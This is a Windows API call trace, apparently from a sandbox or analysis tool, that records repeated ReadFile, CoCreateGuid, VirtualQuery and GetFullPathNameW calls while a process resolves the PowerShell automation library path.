	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.439] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.440] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.441] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.445] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.445] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.445] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.446] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.446] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1c4, lpOverlapped=0x0) returned 1
	[0121.446] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.465] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5241b788, Data2=0x4d25, Data3=0x45eb, Data4=([0]=0x84, [1]=0x3c, [2]=0x18, [3]=0xe1, [4]=0xcd, [5]=0xe6, [6]=0x67, [7]=0x2))) returned 0x0
	[0121.465] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfcc4c6b1, Data2=0xd97e, Data3=0x4ccf, Data4=([0]=0xb3, [1]=0x5, [2]=0x6b, [3]=0x2b, [4]=0x2c, [5]=0xdc, [6]=0x43, [7]=0xd8))) returned 0x0
	[0121.576] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x72b89ed1, Data2=0xe121, Data3=0x4dc9, Data4=([0]=0x88, [1]=0xa4, [2]=0xdc, [3]=0x20, [4]=0x63, [5]=0x50, [6]=0x6f, [7]=0x40))) returned 0x0
	[0121.577] VirtualQuery (in: lpAddress=0xedd88b90, lpBuffer=0xd7edd89a50, dwLength=0x30 | out: lpBuffer=0xd7edd89a50*(BaseAddress=0xedd88000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff88000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.578] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x56bffc7a, Data2=0xfda6, Data3=0x404b, Data4=([0]=0xae, [1]=0x6f, [2]=0xec, [3]=0x6f, [4]=0x79, [5]=0x1d, [6]=0xbd, [7]=0x74))) returned 0x0
	[0121.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.579] VirtualQuery (in: lpAddress=0xedd88b90, lpBuffer=0xd7edd89a50, dwLength=0x30 | out: lpBuffer=0xd7edd89a50*(BaseAddress=0xedd88000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff88000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.581] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7c89586c, Data2=0x3ced, Data3=0x436c, Data4=([0]=0x8b, [1]=0x9b, [2]=0xb8, [3]=0x9a, [4]=0x8c, [5]=0x30, [6]=0x50, [7]=0x84))) returned 0x0
	[0121.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x78e140b6, Data2=0xc6c3, Data3=0x455f, Data4=([0]=0x86, [1]=0xef, [2]=0xd0, [3]=0x24, [4]=0xe8, [5]=0xf5, [6]=0xab, [7]=0x81))) returned 0x0
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.583] VirtualQuery (in: lpAddress=0xedd88b90, lpBuffer=0xd7edd89a50, dwLength=0x30 | out: lpBuffer=0xd7edd89a50*(BaseAddress=0xedd88000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff88000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.584] VirtualQuery (in: lpAddress=0xedd88a00, lpBuffer=0xd7edd898c0, dwLength=0x30 | out: lpBuffer=0xd7edd898c0*(BaseAddress=0xedd88000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff88000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.585] VirtualQuery (in: lpAddress=0xedd88a00, lpBuffer=0xd7edd898c0, dwLength=0x30 | out: lpBuffer=0xd7edd898c0*(BaseAddress=0xedd88000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff88000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.586] VirtualQuery (in: lpAddress=0xedd88a00, lpBuffer=0xd7edd898c0, dwLength=0x30 | out: lpBuffer=0xd7edd898c0*(BaseAddress=0xedd88000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff88000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.593] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x85a0c04d, Data2=0x8237, Data3=0x49f3, Data4=([0]=0xb3, [1]=0x8, [2]=0x62, [3]=0x39, [4]=0x91, [5]=0x26, [6]=0x56, [7]=0x2d))) returned 0x0
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
